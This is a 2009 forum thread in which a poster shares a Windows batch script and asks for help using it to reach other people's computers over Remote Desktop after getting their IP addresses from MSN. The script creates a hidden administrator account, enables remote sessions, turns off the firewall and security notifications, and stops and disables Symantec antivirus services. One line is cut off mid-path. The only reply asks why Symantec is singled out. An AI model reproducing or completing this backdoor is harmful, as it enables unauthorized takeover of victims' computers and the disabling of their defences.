Batch File Hacking Using Remote Desktop :D

Discussion in 'Ethical hacking' started by M4Assault, May 3, 2009.

  1. M4Assault

    M4Assault New Member

    Joined:
    May 3, 2009
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Hey everyone, i have been constructing this batch file for a while now, and am hoping to be able to remote desktop peoples computers with it. Hopefuly by getting their ip adress over msn, and then connecting to their computer. The code is as follows.

    Code:
    @echo off
    net users /add "Username" "Password"
    net localgroup Administrators /add "Username"
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "Username" /t REG_DWORD /d 00000000 /f
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /d 1 /t REG_DWORD /f >nul
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /d 1 /t REG_DWORD /f > nul
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions  /d 1 /t REG_DWORD /f > nul
    net stop wscsvc
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v forceguest /t REG_DWORD /d 00000001 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f 
    
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 00000001 /f
    
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 00000001 /f
    
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 00000001 /f
    
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 00000001 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 00000001 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f
    
    net stop sbservice
    
    net stop "Symantec Core LC"
    
    net stop "ccEvtMgr"
    
    net stop "ccPwdSvc"
    
    net stop "Speed Disk Service"
    
    net stop "NPFMntor" 
    
    net stop "NSCService" 
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\navapsvc" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\GhostStartService" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NProtectService" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVScan" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SBService" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Symantec Core LC" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ccEvtMgr" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ccPwdSvc" /v Start /t REG_DWORD /d 00000004 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 00000000 /f
    Please help me out, is there anything else i will need to add? And with remote dekstop do i just type in their ip adress and port number?

    Thanks
     
  2. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    720
    Likes Received:
    16
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    http://computertipaday.blogspot.com
    One thing.! Why u re particular about symantec?
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice